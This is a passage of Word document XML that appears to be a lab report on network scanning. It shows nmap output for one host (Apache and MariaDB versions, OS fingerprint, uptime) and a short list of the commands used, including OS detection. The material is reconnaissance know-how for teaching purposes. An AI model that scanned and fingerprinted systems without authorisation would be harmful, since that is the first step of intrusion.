          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">| http-methods: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FACA4C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|_  Supported Methods: GET POST OPTIONS HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F8D04" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|_http-server-header: Apache/2.4.29 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441B044" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|_http-title: Apache2 Debian Default Page: It works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713E410" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3306/tcp open  mysql   MySQL 5.5.5-10.1.29-MariaDB-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31211EF8" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">| mysql-info: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADCBCF" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Protocol: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70BB7C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Version: 5.5.5-10.1.29-MariaDB-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5647B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Thread ID: 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C93C1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Capabilities flags: 63487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D417C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Some Capabilities: ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, LongColumnFlag, Support41Auth, LongPassword, SupportsTransactions, IgnoreSigpipes, FoundRows, SupportsCompression, SupportsLoadDataLocal, Speaks41ProtocolNew, InteractiveClient, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05FAE1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Status: Autocommit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76527E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|   Salt: acM7i/KiSD8.zAr&lt;tR|&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294793ED" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|_  Auth Plugin Name: 96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02B128" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14531F01" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Running: Linux 3.X|4.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D92A2D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33DEC2" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS details: Linux 3.8 - 4.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F58D38" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uptime guess: 29.756 days (since Mon May 28 22:15:36 2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3787E4" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Distance: 0 hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39651AE8" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP Sequence Prediction: Difficulty=244 (Good luck!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C61164" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP ID Sequence Generation: All zeros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279624BD" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Service Info: OS: Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C206E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A44F786" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSE: Script Post-scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8A82C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB86750" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 0.00s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79606544" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219CFA1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 0.00s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EF296" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read data files from: /usr/bin/../share/nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED2696" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EDF48C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB9791" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           Raw packets sent: 1022 (45.778KB) | Rcvd: 2045 (87.112KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882877F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1294C33E" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23438B12" wp14:editId="713B012F">
            <wp:extent cx="5893904" cy="43687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4799" cy="4384214"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012EC86" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRPr="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA96B7F" wp14:editId="218DD80E">
            <wp:extent cx="5923722" cy="4431822"/>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2486" cy="4445861"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108CA11" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693CAB8A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578DC445" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands used:-  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF5D8F" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A536A1" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install nmap – to install the service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D85C0" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–O – for enable os detection.</w:t>
      </w:r>
    </w:p>
